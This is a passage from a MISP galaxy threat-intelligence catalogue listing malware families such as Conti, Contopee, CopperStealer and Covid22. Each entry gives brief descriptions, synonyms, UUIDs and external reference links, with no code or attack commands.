- https://www.sophos.com/fr-fr/medialibrary/PDFs/marketing%20material/confickeranalysis.pdf - webarchive
- https://web.archive.org/web/20160616170611/https://media.blackhat.com/bh-eu-10/presentations/Carrera_Silberman/BlackHat-EU-2010-Carrera-Silberman-State-of-Malware-slides.pdf - webarchive
- https://www.kaspersky.com/about/press-releases/2009_kaspersky-lab-analyses-new-version-of-kido--conficker - webarchive
- https://github.com/tillmannw/cnfckr - webarchive
- http://contagiodump.blogspot.com/2009/05/win32conficker.html - webarchive
- http://www.csl.sri.com/users/vinod/papers/Conficker/addendumC/index.html - webarchive
- https://github.com/itaymigdal/malware-analysis-writeups/blob/main/Conficker/Conficker.md - webarchive
- https://www.minitool.com/backup-tips/conficker-worm.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Confucius
Internal MISP references
UUID fe43c7e6-1d62-4421-9d85-519f53e8073f
which can be used as unique global reference for Confucius
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.confucius - webarchive
- https://blog.nsfocus.net/aptconfuciuspakistanibo/ - webarchive
- https://researchcenter.paloaltonetworks.com/2016/09/unit42-confucius-says-malware-families-get-further-by-abusing-legitimate-websites/ - webarchive
- https://www.trendmicro.com/en_us/research/18/h/the-urpage-connection-to-bahamut-confucius-and-patchwork.html - webarchive
- https://researchcenter.paloaltonetworks.com/2017/11/unit42-recent-inpage-exploits-lead-multiple-malware-families/ - webarchive
- https://www.trendmicro.com/en_us/research/21/h/confucius-uses-pegasus-spyware-related-lures-to-target-pakistani.html - webarchive
- https://www.uptycs.com/blog/confucius-apt-deploys-warzone-rat - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Conti (Windows)
Conti is an extremely damaging ransomware due to the speed with which it encrypts data and spreads to other systems. It was first observed in 2020 and is thought to be run by a Russia-based cybercrime group operating under the Wizard Spider pseudonym. In early May 2022, the US government announced a reward of up to $10 million for information on the Conti ransomware gang.
Internal MISP references
UUID c9dca6f3-2a84-4abe-8f33-ccb7a7a0246c
which can be used as unique global reference for Conti (Windows)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.conti - webarchive
- https://www.trmlabs.com/post/analysis-corroborates-suspected-ties-between-conti-and-ryuk-ransomware-groups-and-wizard-spider - webarchive
- https://www.bleepingcomputer.com/news/security/hackers-use-contis-leaked-ransomware-to-attack-russian-companies/ - webarchive
- https://www.trendmicro.com/vinfo/us/security/news/ransomware-by-the-numbers/lockbit-conti-and-blackcat-lead-pack-amid-rise-in-active-raas-and-extortion-groups-ransomware-in-q1-2022 - webarchive
- https://www.connectwise.com/resources/conti-profile - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2022-0802.pdf - webarchive
- https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/787/original/ransomware-chats.pdf?1651576098 - webarchive
- https://news.sophos.com/en-us/2021/02/16/what-to-expect-when-youve-been-hit-with-conti-ransomware/ - webarchive
- https://www.bleepingcomputer.com/news/security/ryuk-successor-conti-ransomware-releases-data-leak-site/ - webarchive
- https://www.truesec.com/hub/blog/proxyshell-qbot-and-conti-ransomware-combined-in-a-series-of-cyber-attacks - webarchive
- https://www.sekoia.io/en/an-insider-insights-into-conti-operations-part-one - webarchive
- https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/787/original/ransomware-chats.pdf - webarchive
- https://blogs.blackberry.com/en/2022/09/the-curious-case-of-monti-ransomware-a-real-world-doppelganger - webarchive
- https://medium.com/@lcam/lighting-the-exfiltration-infrastructure-of-a-lockbit-affiliate-and-more-f57fbb7a4e79 - webarchive
- https://www.advanced-intel.com/post/hunting-for-corporate-insurance-policies-indicators-of-ransom-exfiltrations - webarchive
- https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/ - webarchive
- https://github.com/cdong1012/ContiUnpacker - webarchive
- https://intel471.com/blog/conti-emotet-ransomware-conti-leaks - webarchive
- https://blog.talosintelligence.com/2021/09/Conti-leak-translation.html - webarchive
- https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/ - webarchive
- https://twitter.com/AltShiftPrtScn/status/1423188974298861571 - webarchive
- https://www.youtube.com/watch?v=uORuVVQzZ0A - webarchive
- https://blog.bushidotoken.net/2022/04/lessons-from-conti-leaks.html - webarchive
- https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-conti - webarchive
- https://www.advintel.io/post/24-hours-from-log4shell-to-local-admin-deep-dive-into-conti-gang-attack-on-fortune-500-dfir - webarchive
- https://www.silentpush.com/blog/consequences-the-conti-leaks-and-future-problems - webarchive
- https://www.crowdstrike.com/blog/wizard-spider-adversary-update/ - webarchive
- https://thedfirreport.com/2021/09/13/bazarloader-to-conti-ransomware-in-32-hours/ - webarchive
- https://thedfirreport.com/2021/12/13/diavol-ransomware/ - webarchive
- https://www.unh4ck.com/detection-engineering-and-threat-hunting/lateral-movement/detecting-conti-cobaltstrike-lateral-movement-techniques-part-1 - webarchive
- https://www.bleepingcomputer.com/news/security/hhs-conti-ransomware-encrypted-80-percent-of-irelands-hse-it-systems/ - webarchive
- https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/ - webarchive
- https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/ - webarchive
- https://therecord.media/disgruntled-ransomware-affiliate-leaks-the-conti-gangs-technical-manuals/ - webarchive
- https://unit42.paloaltonetworks.com/bumblebee-malware-projector-libra/ - webarchive
- https://securityaffairs.co/wordpress/128190/cyber-crime/conti-ransomware-takes-over-trickbot.html - webarchive
- https://cluster25.io/2022/03/02/contis-source-code-deep-dive-into/ - webarchive
- https://www.cert.ssi.gouv.fr/uploads/CERTFR-2023-CTI-007.pdf - webarchive
- https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti - webarchive
- https://medium.com/@arnozobec/analyzing-conti-leaks-without-speaking-russian-only-methodology-f5aecc594d1b - webarchive
- https://www.redhotcyber.com/post/il-ransomware-conti-si-schiera-a-favore-della-russia - webarchive
- https://www.threatstop.com/blog/first-conti-then-hive-costa-rica-gets-hit-with-ransomware-again - webarchive
- https://securelist.com/luna-black-basta-ransomware/106950 - webarchive
- https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself - webarchive
- https://0xthreatintel.medium.com/reversing-conti-ransomware-bfce15019e74 - webarchive
- https://www.splunk.com/en_us/pdfs/resources/whitepaper/an-empirically-comparative-analysis-of-ransomware-binaries.pdf - webarchive
- https://www.splunk.com/en_us/blog/security/gone-in-52-seconds-and-42-minutes-a-comparative-analysis-of-ransomware-encryption-speed.html - webarchive
- https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/ - webarchive
- https://analyst1.com/blog/ransom-mafia-analysis-of-the-worlds-first-ransomware-cartel - webarchive
- https://twitter.com/TheDFIRReport/status/1498642512935800833 - webarchive
- https://www.advanced-intel.com/post/secret-backdoor-behind-conti-ransomware-operation-introducing-atera-agent - webarchive
- https://strapi.eurepoc.eu/uploads/Eu_Repo_C_APT_profile_Conti_Wizard_Spider_dc2a733e18.pdf - webarchive
- https://www.bleepingcomputer.com/news/security/karakurt-revealed-as-data-extortion-arm-of-conti-cybercrime-syndicate/ - webarchive
- https://www.bleepingcomputer.com/news/security/taiwanese-apple-and-tesla-contractor-hit-by-conti-ransomware/ - webarchive
- https://www.mbsd.jp/research/20210413/conti-ransomware/ - webarchive
- https://nattothoughts.substack.com/p/ransom-war-russian-extortion-operations - webarchive
- https://threatpost.com/conti-ransomware-decryptor-trickbot-source-code-leaked/178727/ - webarchive
- https://www.prodaft.com/m/reports/Conti_TLPWHITE_v1.6_WVcSEtc.pdf - webarchive
- https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3 - webarchive
- https://cyware.com/news/ransomware-becomes-deadlier-conti-makes-the-most-money-39e17bae/ - webarchive
- https://www.bankinfosecurity.com/cybercrime-moves-conti-ransomware-absorbs-trickbot-malware-a-18573 - webarchive
- https://www.bleepingcomputer.com/news/security/microsoft-exchange-servers-hacked-to-deploy-hive-ransomware/ - webarchive
- https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html - webarchive
- https://cybersecurity.att.com/blogs/security-essentials/stories-from-the-soc-powershell-proxyshell-conti-ttps-oh-my - webarchive
- https://yoroi.company/research/conti-ransomware-source-code-a-well-designed-cots-ransomware/ - webarchive
- https://www.sekoia.io/en/an-insider-insights-into-conti-operations-part-two/ - webarchive
- https://www.hse.ie/eng/services/publications/conti-cyber-attack-on-the-hse-full-report.pdf - webarchive
- https://www.coveware.com/blog/2022/1/26/ransomware-as-a-service-innovation-curve - webarchive
- https://www.bleepingcomputer.com/news/security/conti-ransomware-source-code-leaked-by-ukrainian-researcher/ - webarchive
- https://research.nccgroup.com/2022/03/31/conti-nuation-methods-and-techniques-observed-in-operations-post-the-leaks/ - webarchive
- https://www.cybereason.com/blog/cybereason-vs.-conti-ransomware - webarchive
- https://www.s-rminform.com/cyber-intelligence-briefing/exmatter-malware-levels-up - webarchive
- https://eclypsium.com/2022/06/02/conti-targets-critical-firmware/ - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf - webarchive
- https://securityandtechnology.org/wp-content/uploads/2021/04/IST-Ransomware-Task-Force_Final_Report.pdf - webarchive
- https://blogs.vmware.com/security/2022/09/threat-report-illuminating-volume-shadow-deletion.html - webarchive
- https://securelist.com/modern-ransomware-groups-ttps/106824/ - webarchive
- https://www.carbonblack.com/blog/tau-threat-discovery-conti-ransomware/ - webarchive
- https://thedfirreport.com/2021/08/01/bazarcall-to-conti-ransomware-via-trickbot-and-cobalt-strike/ - webarchive
- https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/ - webarchive
- https://redcanary.com/blog/intelligence-insights-november-2021/ - webarchive
- https://news.sophos.com/en-us/2022/02/22/cyberthreats-during-russian-ukrainian-tensions-what-can-we-learn-from-history-to-be-prepared/ - webarchive
- https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-annex-download.pdf - webarchive
- https://blog.qualys.com/vulnerabilities-threat-research/2021/11/18/conti-ransomware - webarchive
- https://cocomelonc.github.io/investigation/2022/04/11/malw-inv-conti-2.html - webarchive
- https://www.elliptic.co/blog/conti-ransomware-nets-at-least-25.5-million-in-four-months - webarchive
- https://www.unh4ck.com/detection-engineering-and-threat-hunting/lateral-movement/detecting-conti-cobaltstrike-lateral-movement-techniques-part-2 - webarchive
- https://thehackernews.com/2022/05/malware-analysis-trickbot.html - webarchive
- https://cocomelonc.github.io/tutorial/2022/04/02/malware-injection-18.html - webarchive
- https://therecord.media/conti-leaks-the-panama-papers-of-ransomware/ - webarchive
- https://www.mbsd.jp/2022/03/08/assets/images/MBSD_Summary_of_ContiLeaks_Rev3.pdf - webarchive
- https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/the-sound-of-malware.html - webarchive
- https://research.nccgroup.com/2022/04/29/adventures-in-the-land-of-bumblebee-a-new-malicious-loader/ - webarchive
- https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-double-extortion-and-beyond-revil-clop-and-conti - webarchive
- https://www.prodaft.com/m/reports/WizardSpider_TLPWHITE_v.1.4.pdf - webarchive
- https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-006.pdf - webarchive
- https://www.youtube.com/watch?v=hmaWy9QIC7c - webarchive
- https://www.youtube.com/watch?v=cYx7sQRbjGA - webarchive
- https://www.zscaler.com/blogs/security-research/conti-ransomware-attacks-persist-updated-version-despite-leaks - webarchive
- https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/ - webarchive
- https://therecord.media/conti-ransomware-gang-chats-leaked-by-pro-ukraine-member/ - webarchive
- https://twitter.com/AltShiftPrtScn/status/1350755169965924352 - webarchive
- https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/ - webarchive
- https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware - webarchive
- https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox - webarchive
- https://us-cert.cisa.gov/ncas/alerts/aa21-265a - webarchive
- https://marcoramilli.com/2021/11/07/conti-ransomware-cheat-sheet/ - webarchive
- https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf - webarchive
- https://github.com/TheParmak/conti-leaks-englished - webarchive
- https://www.justice.gov/opa/pr/multiple-foreign-nationals-charged-connection-trickbot-malware-and-conti-ransomware - webarchive
- https://intel471.com/blog/conti-leaks-cybercrime-fire-team - webarchive
- https://intel471.com/blog/conti-vs-monti-a-reinvention-or-just-a-simple-rebranding - webarchive
- https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v - webarchive
- https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf - webarchive
- https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/ - webarchive
- https://analyst1.com/file-assets/RANSOM-MAFIA-ANALYSIS-OF-THE-WORLD%E2%80%99S-FIRST-RANSOMWARE-CARTEL.pdf - webarchive
- https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/ - webarchive
- https://news.sophos.com/en-us/2022/02/28/conti-and-karma-actors-attack-healthcare-provider-at-same-time-through-proxyshell-exploits/?cmp=30728 - webarchive
- https://news.sophos.com/en-us/2021/02/16/conti-ransomware-evasive-by-nature/ - webarchive
- https://www.bleepingcomputer.com/news/security/conti-ransomwares-internal-chats-leaked-after-siding-with-russia/ - webarchive
- https://arcticwolf.com/resources/blog/conti-and-akira-chained-together/ - webarchive
- https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti/ - webarchive
- https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html - webarchive
- https://www.secureworks.com/blog/gold-ulrick-continues-conti-operations-despite-public-disclosures - webarchive
- https://www.cyberark.com/resources/threat-research-blog/conti-group-leaked - webarchive
- https://unit42.paloaltonetworks.com/luna-moth-callback-phishing/ - webarchive
- https://www.darktrace.com/en/blog/the-double-extortion-business-conti-ransomware-gang-finds-new-avenues-of-negotiation/ - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker - webarchive
- https://threatpost.com/affiliate-leaks-conti-ransomware-playbook/168442/ - webarchive
- https://www.bleepingcomputer.com/news/security/cisa-updates-conti-ransomware-alert-with-nearly-100-domain-names/ - webarchive
- https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-as-a-service-enabler-of-widespread-attacks - webarchive
- https://www.esentire.com/blog/analysis-of-leaked-conti-intrusion-procedures-by-esentires-threat-response-unit-tru - webarchive
- https://arcticwolf.com/resources/blog/karakurt-web - webarchive
- https://cocomelonc.github.io/malware/2023/01/04/malware-tricks-26.html - webarchive
- https://twitter.com/AltShiftPrtScn/status/1417849181012647938 - webarchive
- https://areteir.com/wp-content/uploads/2020/08/Arete_Insight_Is-Conti-the-new-Ryuk_August2020.pdf - webarchive
- https://blog.reversinglabs.com/blog/conversinglabs-ep-2-conti-pivots-as-ransomware-as-a-service-struggles - webarchive
- https://lifars.com/wp-content/uploads/2021/10/ContiRansomware_Whitepaper.pdf - webarchive
- https://cocomelonc.github.io/investigation/2022/03/27/malw-inv-conti-1.html - webarchive
- https://github.com/whichbuffer/Conti-Ransomware-IOC - webarchive
- https://www.trendmicro.com/en_us/research/22/c/cyberattacks-are-prominent-in-the-russia-ukraine-conflict.html - webarchive
- https://medium.com/@whickey000/how-i-cracked-conti-ransomware-groups-leaked-source-code-zip-file-e15d54663a8 - webarchive
- https://unit42.paloaltonetworks.com/conti-ransomware-gang/ - webarchive
- https://decoded.avast.io/threatresearch/avast-q2-2022-threat-report/ - webarchive
- http://chuongdong.com/reverse%20engineering/2020/12/15/ContiRansomware/ - webarchive
- https://www.cybereason.com/blog/threat-analysis-report-from-shatak-emails-to-the-conti-ransomware - webarchive
- https://www.bleepingcomputer.com/news/security/conti-ransomware-gang-takes-over-trickbot-malware-operation/ - webarchive
- https://www.threatstop.com/blog/conti-ransomware-source-code-leaked - webarchive
- https://ke-la.com/to-attack-or-not-to-attack-targeting-the-healthcare-sector-in-the-underground-ecosystem/ - webarchive
- https://www.advintel.io/post/ransomware-advisory-log4shell-exploitation-for-initial-access-lateral-movement - webarchive
- https://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/ - webarchive
- https://threatpost.com/conti-ransomware-v-3-including-decryptor-leaked/179006/ - webarchive
- https://cocomelonc.github.io/malware/2023/02/10/malware-analysis-8.html - webarchive
- https://documents.trendmicro.com/assets/pdf/datasheet-ransomware-in-Q1-2022.pdf - webarchive
- https://krebsonsecurity.com/2022/03/conti-ransomware-group-diaries-part-ii-the-office/ - webarchive
- https://securityintelligence.com/posts/trickbot-conti-crypters-where-are-they-now/ - webarchive
- https://content.secureworks.com/-/media/Files/US/Reports/Monthly%20Threat%20Intelligence/Secureworks_ECO1_ThreatIntelligenceExecutiveReport2022Vol2.ashx - webarchive
- https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound - webarchive
- https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/ - webarchive
- https://www.ncsc.gov.ie/pdfs/HSE_Conti_140521_UPDATE.pdf - webarchive
- https://arcticwolf.com/resources/blog/conti-ransomware-leak-analyzed - webarchive
- https://nakedsecurity.sophos.com/2021/08/06/conti-ransomware-affiliate-goes-rogue-leaks-company-data/ - webarchive
- https://medium.com/walmartglobaltech/from-royal-with-love-88fa05ff7f65 - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/log4j-vulnerabilities-attacks - webarchive
- https://news.sophos.com/en-us/2021/02/16/conti-ransomware-attack-day-by-day/ - webarchive
- https://intel471.com/blog/shipping-companies-ransomware-credentials - webarchive
- https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf - webarchive
- https://www.advintel.io/post/hydra-with-three-heads-blackbyte-the-future-of-ransomware-subsidiary-groups - webarchive
- https://www.bleepingcomputer.com/news/security/angry-conti-ransomware-affiliate-leaks-gangs-attack-playbook/ - webarchive
- https://www.crowdstrike.com/blog/how-to-defend-against-conti-darkside-revil-and-other-ransomware/ - webarchive
- https://medium.com/cycraft/the-road-to-ransomware-resilience-c1ca37036efd - webarchive
- https://cti-league.com/wp-content/uploads/2021/02/CTI-League-Darknet-Report-2021.pdf - webarchive
- https://www.ic3.gov/Media/News/2021/210521.pdf - webarchive
- https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/ - webarchive
- https://securityaffairs.com/141666/cyber-crime/lockbit-green-ransomware-variant.html - webarchive
- https://www.prevailion.com/what-wicked-webs-we-unweave/ - webarchive
- https://www.clearskysec.com/wp-content/uploads/2021/02/Conti-Ransomware.pdf - webarchive
- https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/c/cyberattacks-are-prominent-in-the-russia-ukraine-conflict/IOC%20Resource%20for%20Russia-Ukraine%20Conflict-Related%20Cyberattacks-03032022.pdf - webarchive
- https://www.secureworks.com/blog/gold-ulrick-leaks-reveal-organizational-structure-and-relationships - webarchive
- https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf - webarchive
- https://www.0ffset.net/reverse-engineering/capstone-resolving-stack-strings/ - webarchive
- https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf - webarchive
- https://www.ironnet.com/blog/ransomware-graphic-blog - webarchive
- https://attackiq.com/2022/06/15/attack-graph-emulating-the-conti-ransomware-teams-behaviors/ - webarchive
- https://research.checkpoint.com/2022/leaks-of-conti-ransomware-group-paint-picture-of-a-surprisingly-normal-tech-start-up-sort-of/ - webarchive
- https://www.advintel.io/post/backup-removal-solutions-from-conti-ransomware-with-love - webarchive
- https://www.cynet.com/attack-techniques-hands-on/shelob-moonlight-spinning-a-larger-web/ - webarchive
- https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-group-targets-esxi-hypervisors-with-its-linux-variant.html - webarchive
- https://assets.sentinelone.com/ransomware-enterprise/conti-ransomware-unpacked - webarchive
- https://github.com/EmissarySpider/ransomware-descendants - webarchive
- https://krebsonsecurity.com/2021/10/conti-ransom-gang-starts-selling-access-to-victims/ - webarchive
- https://www.cyberscoop.com/ransomware-gang-conti-bounced-back/ - webarchive
- https://www.dragos.com/blog/industry-news/dragos-ics-ot-ransomware-analysis-q4-2021/ - webarchive
- https://www.fortinet.com/blog/threat-research/diavol-new-ransomware-used-by-wizard-spider - webarchive
- https://www.first.org/resources/papers/conf2023/FIRSTCON23-TLPCLEAR-Staubmann-Busy-Bees.pptx - webarchive
- https://blog.talosintelligence.com/2022/05/conti-and-hive-ransomware-operations.html - webarchive
- https://www.eldiario.es/tecnologia/capos-cibercrimen-avisan-contratacaran-si-hackea-rusia_1_8795458.html - webarchive
- https://share.vx-underground.org/Conti/ - webarchive
- https://www.advintel.io/post/discontinued-the-end-of-conti-s-brand-marks-new-chapter-for-cybercrime-landscape - webarchive
- https://thedfirreport.com/2021/05/12/conti-ransomware/ - webarchive
- https://www.domaintools.com/resources/blog/the-most-prolific-ransomware-families-a-defenders-guide - webarchive
- https://www.dragos.com/blog/industry-news/suspected-conti-ransomware-activity-in-the-auto-manufacturing-sector/ - webarchive
- https://www.esentire.com/blog/conti-affiliate-exposed-new-domain-names-ip-addresses-and-email-addresses-uncovered-by-esentire - webarchive
- https://damonmccoy.com/papers/Ransomware_eCrime22.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Contopee
FireEye described this malware as a proxy-aware backdoor that communicates using a custom-encrypted binary protocol. It may use the registry to store optional configuration data. The backdoor has been observed to support 26 commands that include directory traversal, file system manipulation, data archival and transmission, and command execution.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Contopee.
Known Synonyms |
---|
WHITEOUT |
Internal MISP references
UUID 4181ebb5-cce9-4fb1-81a1-c3f34cb643de
which can be used as unique global reference for Contopee
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.contopee - webarchive
- https://web.archive.org/web/20160527050022/https://www.symantec.com/connect/blogs/swift-attackers-malware-linked-more-financial-attacks - webarchive
- https://www.symantec.com/connect/blogs/swift-attackers-malware-linked-more-financial-attacks - webarchive
- https://content.fireeye.com/apt/rpt-apt38 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
CookieBag
Internal MISP references
UUID 9afa9b7e-e2c1-4725-8d8d-cec7933cc63b
which can be used as unique global reference for CookieBag
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
CopperStealer
According to PCRisk, CopperStealer, also known as Mingloa, is a malicious program designed to steal sensitive/personal information. It also has the capability to cause chain infections (i.e., to download/install additional malware).
Significant activity of CopperStealer has been observed in Brazil, India, Indonesia, Pakistan, and the Philippines. At the time of research, this malware had been noted being spread via websites offering illegal activation tools ("cracks") for licensed software products.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular CopperStealer.
Known Synonyms |
---|
Mingloa |
Internal MISP references
UUID 87afcc5d-27f6-4427-b43c-4621a66e5041
which can be used as unique global reference for CopperStealer
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.copper_stealer - webarchive
- https://www.trendmicro.com/en_us/research/22/h/copperstealer-distributes-malicious-chromium-browser-extension-steal-cryptocurrencies.html - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/now-you-see-it-now-you-dont-copperstealer-performs-widespread-theft - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Corebot
Internal MISP references
UUID 495377c4-1be5-4c65-ba66-94c221061415
which can be used as unique global reference for Corebot
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.corebot - webarchive
- https://www.crowdstrike.com/blog/ecrime-ecosystem/ - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report_BosonSpider.pdf - webarchive
- https://malwarebreakdown.com/2017/09/11/re-details-malspam-downloads-corebot-banking-trojan/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
CoreDN
Internal MISP references
UUID 331f0c80-a795-48aa-902e-0b0d57de85f5
which can be used as unique global reference for CoreDN
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.coredn - webarchive
- https://www.symantec.com/security-center/writeup/2018-021216-4405-99#technicaldescription - webarchive
- https://blog.talosintelligence.com/2019/01/fake-korean-job-posting.html - webarchive
- https://blog.alyac.co.kr/2105 - webarchive
- https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/lazarus-resurfaces-targets-global-banks-bitcoin-users/#atricle-content - webarchive
- https://www.mcafee.com/blogs/other-blogs/mcafee-labs/lazarus-resurfaces-targets-global-banks-bitcoin-users/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Coreshell
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Coreshell.
Known Synonyms |
---|
SOURFACE |
Internal MISP references
UUID 579cc23d-4ba4-419f-bf8a-f235ed33125e
which can be used as unique global reference for Coreshell
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.coreshell - webarchive
- https://www.mandiant.com/sites/default/files/2021-09/APT28-Center-of-Storm-2017.pdf - webarchive
- https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/ - webarchive
- https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html - webarchive
- http://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf - webarchive
- http://malware.prevenity.com/2014/08/malware-info.html - webarchive
- http://www.malware-reversing.com/2012/12/3-disclosure-of-another-0day-malware.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
CoronaVirus Ransomware
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular CoronaVirus Ransomware.
Known Synonyms |
---|
CoronaVirus Cover-Ransomware |
Internal MISP references
UUID ba683942-1524-459a-ad46-827464967164
which can be used as unique global reference for CoronaVirus Ransomware
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
CosmicDuke
Internal MISP references
UUID 14990e2c-81a2-4750-b9a8-7535d152e437
which can be used as unique global reference for CosmicDuke
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Cotx RAT
Internal MISP references
UUID 47190b56-5176-4e8b-8c78-fcc10e511fa2
which can be used as unique global reference for Cotx RAT
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.cotx - webarchive
- https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf - webarchive
- https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html - webarchive
- https://www.youtube.com/watch?v=1WfPlgtfWnQ - webarchive
- https://www.trendmicro.com/en_in/research/21/k/analyzing-proxyshell-related-incidents-via-trend-micro-managed-x.html - webarchive
- https://vblocalhost.com/uploads/VB2020-Ozawa-etal.pdf - webarchive
- https://vb2020.vblocalhost.com/uploads/VB2020-Ozawa-etal.pdf - webarchive
- https://st.drweb.com/static/new-www/news/2021/april/drweb_research_attacks_on_russian_research_institutes_en.pdf - webarchive
- https://www.socinvestigation.com/chinese-new-backdoor-deployed-for-cyberespionage/ - webarchive
- https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-Targeted-attack-on-industrial-enterprises-and-public-institutions-En.pdf - webarchive
- https://vblocalhost.com/uploads/VB2020-20.pdf - webarchive
- https://vb2020.vblocalhost.com/uploads/VB2020-20.pdf - webarchive
- https://www.proofpoint.com/us/threat-insight/post/chinese-apt-operation-lagtime-it-targets-government-information-technology - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Cova
Internal MISP references
UUID cad667c1-be0a-49db-b2fb-462082a04fbe
which can be used as unique global reference for Cova
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Covicli
Covicli is a modified SSLeay32 dynamic library that acts as a backdoor. The library allows the attacker to communicate with the C2 over OpenSSL.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Covicli.
Known Synonyms |
---|
Covically |
Internal MISP references
UUID e8986c0c-2997-425d-ae4e-529f82d3fa48
which can be used as unique global reference for Covicli
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Covid22
Destructive "joke" malware that ultimately deploys a wiper for the MBR.
Internal MISP references
UUID d4796a4f-63f0-42f0-a043-fb91416c29d2
which can be used as unique global reference for Covid22
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
CoViper
